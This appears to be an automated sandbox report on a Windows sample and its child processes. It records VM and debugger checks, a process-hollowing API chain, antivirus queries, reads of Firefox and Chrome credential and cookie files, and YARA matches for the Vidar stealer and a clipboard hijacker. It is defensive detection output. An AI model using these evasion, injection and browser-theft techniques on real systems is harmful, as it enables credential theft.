Source: UXNob1Dp32.exe, 00000006.00000002.4081262958.00000000006E8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW0
Source: UXNob1Dp32.exe, 00000005.00000003.1735594551.00000000097F2000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: VMware20,1
Source: UXNob1Dp32.exe, 00000001.00000003.1641969430.0000000000753000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000001.00000002.1650388933.0000000000753000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000001.00000002.1650388933.00000000006F8000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000001.00000003.1643163181.0000000000753000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000002.2201568233.0000000000696000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000006.00000002.4081262958.0000000000744000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.1935491088.0000000000928000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: build2.exe, 00000009.00000002.1935491088.0000000000928000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware
Source: UXNob1Dp32.exe, 00000001.00000002.1650388933.0000000000738000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}X

Source: C:\Users\user\Desktop\UXNob1Dp32.exe

API call chain: ExitProcess graph end node

Source: C:\Users\user\Desktop\UXNob1Dp32.exe

Process information queried: ProcessInformation

Jump to behavior

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Users\user\Desktop\UXNob1Dp32.exe

Code function: 0_2_0426571C rdtsc

0_2_0426571C

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Source: C:\Users\user\Desktop\UXNob1Dp32.exe

Code function: 0_2_0040909D IsDebuggerPresent,

0_2_0040909D

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Source: C:\Users\user\Desktop\UXNob1Dp32.exe

Code function: 1_2_0042A57A EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,

1_2_0042A57A

Contains functionality to dynamically determine API calls

Source: C:\Users\user\Desktop\UXNob1Dp32.exe

1_2_00412220

Contains functionality to read the PEB

Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 0_2_042640A3 push dword ptr fs:[00000030h]	0_2_042640A3
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 0_2_05E30042 push dword ptr fs:[00000030h]	0_2_05E30042
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 3_2_0441E0A3 push dword ptr fs:[00000030h]	3_2_0441E0A3
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 3_2_05E50042 push dword ptr fs:[00000030h]	3_2_05E50042
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Code function: 4_2_045770A3 push dword ptr fs:[00000030h]	4_2_045770A3
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Code function: 4_2_05DC0042 push dword ptr fs:[00000030h]	4_2_05DC0042

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Source: C:\Users\user\Desktop\UXNob1Dp32.exe

Code function: 0_2_00408568 GetProcessHeap,

0_2_00408568

Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 0_2_00409028 SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00409028
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 1_2_004329EC SetUnhandledExceptionFilter,UnhandledExceptionFilter,	1_2_004329EC
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 1_2_004329BB SetUnhandledExceptionFilter,	1_2_004329BB

HIPS / PFW / Operating System Protection Evasion

Contains functionality to inject code into remote processes

Source: C:\Users\user\Desktop\UXNob1Dp32.exe

Code function: 0_2_05E30110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,ExitProcess,

0_2_05E30110

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Memory written: C:\Users\user\Desktop\UXNob1Dp32.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Memory written: C:\Users\user\Desktop\UXNob1Dp32.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Memory written: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\AppData\Local\24c79069-10a0-4140-9323-7c1741b1b662\build2.exe	Memory written: C:\Users\user\AppData\Local\24c79069-10a0-4140-9323-7c1741b1b662\build2.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Memory written: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\24c79069-10a0-4140-9323-7c1741b1b662\build3.exe	Memory written: C:\Users\user\AppData\Local\24c79069-10a0-4140-9323-7c1741b1b662\build3.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Memory written: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Memory written: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Memory written: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Memory written: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Memory written: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe base: 400000 value starts with: 4D5A

Contains functionality to launch a program with higher privileges

Source: C:\Users\user\Desktop\UXNob1Dp32.exe

Code function: 1_2_00419F90 GetCurrentProcess,GetLastError,GetLastError,SetPriorityClass,GetLastError,GetModuleFileNameW,PathRemoveFileSpecW,GetCommandLineW,CommandLineToArgvW,lstrcpyW,lstrcmpW,lstrcmpW,lstrcpyW,lstrcpyW,lstrcmpW,lstrcmpW,GlobalFree,lstrcpyW,lstrcpyW,OpenProcess,WaitForSingleObject,CloseHandle,Sleep,GlobalFree,GetCurrentProcess,GetExitCodeProcess,TerminateProcess,CloseHandle,lstrcatW,GetVersion,lstrcpyW,lstrcatW,lstrcatW,_memset,ShellExecuteExW,CreateThread,lstrlenA,lstrcatW,_malloc,lstrcatW,_memset,lstrcatW,MultiByteToWideChar,lstrcatW,lstrlenW,CreateThread,WaitForSingleObject,CreateMutexA,CreateMutexA,lstrlenA,lstrcpyA,_memmove,_memmove,_memmove,GetUserNameW,GetMessageW,GetMessageW,DispatchMessageW,TranslateMessage,TranslateMessage,DispatchMessageW,GetMessageW,PostThreadMessageW,PeekMessageW,PostThreadMessageW,PeekMessageW,DispatchMessageW,PeekMessageW,WaitForSingleObject,PostThreadMessageW,PeekMessageW,DispatchMessageW,PeekMessageW,WaitForSingleObject,CloseHandle,

1_2_00419F90

Creates a process in suspended mode (likely to inject code)

Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Process created: C:\Users\user\Desktop\UXNob1Dp32.exe "C:\Users\user\Desktop\UXNob1Dp32.exe"	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Process created: C:\Users\user\Desktop\UXNob1Dp32.exe "C:\Users\user\Desktop\UXNob1Dp32.exe" --Admin IsNotAutoStart IsNotTask	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Process created: C:\Users\user\Desktop\UXNob1Dp32.exe "C:\Users\user\Desktop\UXNob1Dp32.exe" --Admin IsNotAutoStart IsNotTask	Jump to behavior
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Process created: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe --Task	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Process created: C:\Users\user\AppData\Local\24c79069-10a0-4140-9323-7c1741b1b662\build2.exe "C:\Users\user\AppData\Local\24c79069-10a0-4140-9323-7c1741b1b662\build2.exe"	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Process created: C:\Users\user\AppData\Local\24c79069-10a0-4140-9323-7c1741b1b662\build3.exe "C:\Users\user\AppData\Local\24c79069-10a0-4140-9323-7c1741b1b662\build3.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\24c79069-10a0-4140-9323-7c1741b1b662\build2.exe	Process created: C:\Users\user\AppData\Local\24c79069-10a0-4140-9323-7c1741b1b662\build2.exe "C:\Users\user\AppData\Local\24c79069-10a0-4140-9323-7c1741b1b662\build2.exe"
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Process created: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe "C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe" --AutoStart
Source: C:\Users\user\AppData\Local\24c79069-10a0-4140-9323-7c1741b1b662\build3.exe	Process created: C:\Users\user\AppData\Local\24c79069-10a0-4140-9323-7c1741b1b662\build3.exe "C:\Users\user\AppData\Local\24c79069-10a0-4140-9323-7c1741b1b662\build3.exe"
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Process created: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Process created: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe "C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe" --AutoStart
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Process created: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Process created: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Process created: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe

Contains functionality to query CPU information (cpuid)

Source: C:\Users\user\Desktop\UXNob1Dp32.exe

Code function: 0_2_05E580F6 cpuid

0_2_05E580F6

Contains functionality to query locales information (e.g. system language)

Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,	0_2_05E70AB6
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: _LcidFromHexString,GetLocaleInfoW,_TestDefaultLanguage,	1_2_00438178
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,	1_2_00440116
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: _wcscmp,_wcscmp,GetLocaleInfoW,GetLocaleInfoW,GetACP,	1_2_004382A2
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: GetLocaleInfoW,_GetPrimaryLen,	1_2_0043834F
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: _memset,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_GetLcidFromCountry,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,___crtDownlevelLCIDToLocaleName,___crtDownlevelLCIDToLocaleName,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,__itow_s,	1_2_00438423
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: EnumSystemLocalesW,	1_2_004387C8
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: GetLocaleInfoW,	1_2_0043884E
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: _TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_GetLocaleNameFromDefault,IsValidCodePage,_wcschr,_wcschr,__itow_s,_LcidFromHexString,GetLocaleInfoW,	1_2_00437BB3
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: EnumSystemLocalesW,	1_2_00437E27
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: _GetPrimaryLen,EnumSystemLocalesW,	1_2_00437E83
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: _GetPrimaryLen,EnumSystemLocalesW,	1_2_00437F00
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: _LcidFromHexString,GetLocaleInfoW,GetLocaleInfoW,__wcsnicmp,GetLocaleInfoW,_TestDefaultLanguage,	1_2_00437F83
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,	3_2_05E90AB6
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,	4_2_05E00AB6

Queries information about the installed CPU (vendor, model number etc)

Source: C:\Users\user\AppData\Local\24c79069-10a0-4140-9323-7c1741b1b662\build2.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Local\24c79069-10a0-4140-9323-7c1741b1b662\build2.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0

Queries the volume information (name, serial number etc) of a device

Source: C:\Users\user\AppData\Local\24c79069-10a0-4140-9323-7c1741b1b662\build2.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\24c79069-10a0-4140-9323-7c1741b1b662\build2.exe	Queries volume information: C:\ VolumeInformation

Source: C:\Users\user\Desktop\UXNob1Dp32.exe

Code function: 0_2_00408AF4 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_00408AF4

Source: C:\Users\user\Desktop\UXNob1Dp32.exe

1_2_00419F90

Source: C:\Users\user\Desktop\UXNob1Dp32.exe

Code function: 1_2_0042FE47 __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,

1_2_0042FE47

Source: C:\Users\user\Desktop\UXNob1Dp32.exe

1_2_00419F90

Source: C:\Users\user\Desktop\UXNob1Dp32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

AV process strings found (often used to terminate AV products)

Source: build2.exe, 00000009.00000002.1935491088.0000000000993000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.1935491088.0000000000928000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Source: C:\Users\user\AppData\Local\24c79069-10a0-4140-9323-7c1741b1b662\build2.exe

WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct

Stealing of Sensitive Information

Yara detected Clipboard Hijacker

Source: Yara match	File source: 14.2.build3.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 29.2.mstsca.exe.9715a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.mstsca.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 27.2.mstsca.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.build3.exe.8115a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 27.2.mstsca.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.2.mstsca.exe.9315a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.2.mstsca.exe.23115a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 30.2.mstsca.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 30.2.mstsca.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 32.2.mstsca.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 32.2.mstsca.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.mstsca.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.build3.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.mstsca.exe.9715a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000001F.00000002.3619043820.0000000000930000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.4080039509.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.2386525416.0000000002310000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.1879406390.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000002.3032277609.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.2385413925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000002.3032732772.0000000000970000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.1981619549.0000000000970000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.1870730144.0000000000810000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000002.3618417381.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

Yara detected Vidar stealer

Source: Yara match	File source: 9.2.build2.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.build2.exe.35a15a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.build2.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.build2.exe.35a15a0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000002.1752904498.00000000035A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1934156488.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: build2.exe PID: 7380, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: build2.exe PID: 7396, type: MEMORYSTR

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\UXNob1Dp32.exe	File opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\fqs92o4p.default-release\ExperimentStoreData.json	Jump to behavior
Source: C:\Users\user\AppData\Local\24c79069-10a0-4140-9323-7c1741b1b662\build2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	File opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\24c79069-10a0-4140-9323-7c1741b1b662\build2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	File opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\fqs92o4p.default-release\shield-preference-experiments.json	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	File opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\fqs92o4p.default-release\favicons.sqlite-wal	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	File opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\fqs92o4p.default-release\handlers.json	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	File opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\fqs92o4p.default-release\protections.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	File opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-wal	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	File opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\fqs92o4p.default-release\Telemetry.FailedProfileLocks.txt	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	File opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\fqs92o4p.default-release\addonStartup.json.lz4	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	File opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\fqs92o4p.default-release\content-prefs.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	File opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\fqs92o4p.default-release\addons.json	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	File opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\fqs92o4p.default-release\targeting.snapshot.json	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	File opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\fqs92o4p.default-release\webappsstore.sqlite-shm	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	File opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\z6bny8rn.default\times.json	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	File opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Google Profile.ico	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	File opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\fqs92o4p.default-release\pkcs11.txt	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	File opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\fqs92o4p.default-release\search.json.mozlz4	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	File opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	File opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\fqs92o4p.default-release\favicons.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	File opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\fqs92o4p.default-release\permissions.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	File opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\fqs92o4p.default-release\webappsstore.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	File opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\fqs92o4p.default-release\favicons.sqlite-shm	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	File opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\heavy_ad_intervention_opt_out.db-journal	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	File opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	File opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\LOG.old	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	File opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	File opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\fqs92o4p.default-release\containers.json	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	File opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\fqs92o4p.default-release\AlternateServices.txt	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	File opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\fqs92o4p.default-release\extension-preferences.json	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	File opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\heavy_ad_intervention_opt_out.db	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	File opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-wal	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	File opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\fqs92o4p.default-release\parent.lock	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	File opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\fqs92o4p.default-release\sessionstore.jsonlz4	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	File opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\fqs92o4p.default-release\SiteSecurityServiceState.txt	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	File opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\trusted_vault.pb	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	File opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\fqs92o4p.default-release\sessionCheckpoints.json	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	File opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.db	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	File opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\fqs92o4p.default-release\xulstore.json	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	File opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\fqs92o4p.default-release\webappsstore.sqlite-wal	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	File opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-shm	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	File opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\fqs92o4p.default-release\times.json	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	File opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	File opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite	Jump to behavior

Yara detected Credential Stealer

Source: Yara match

File source: Process Memory Space: build2.exe PID: 7396, type: MEMORYSTR

Remote Access Functionality

Yara detected Vidar stealer

Source: Yara match	File source: 9.2.build2.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.build2.exe.35a15a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.build2.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.build2.exe.35a15a0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000002.1752904498.00000000035A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1934156488.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: build2.exe PID: 7380, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: build2.exe PID: 7396, type: MEMORYSTR

Screenshots

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
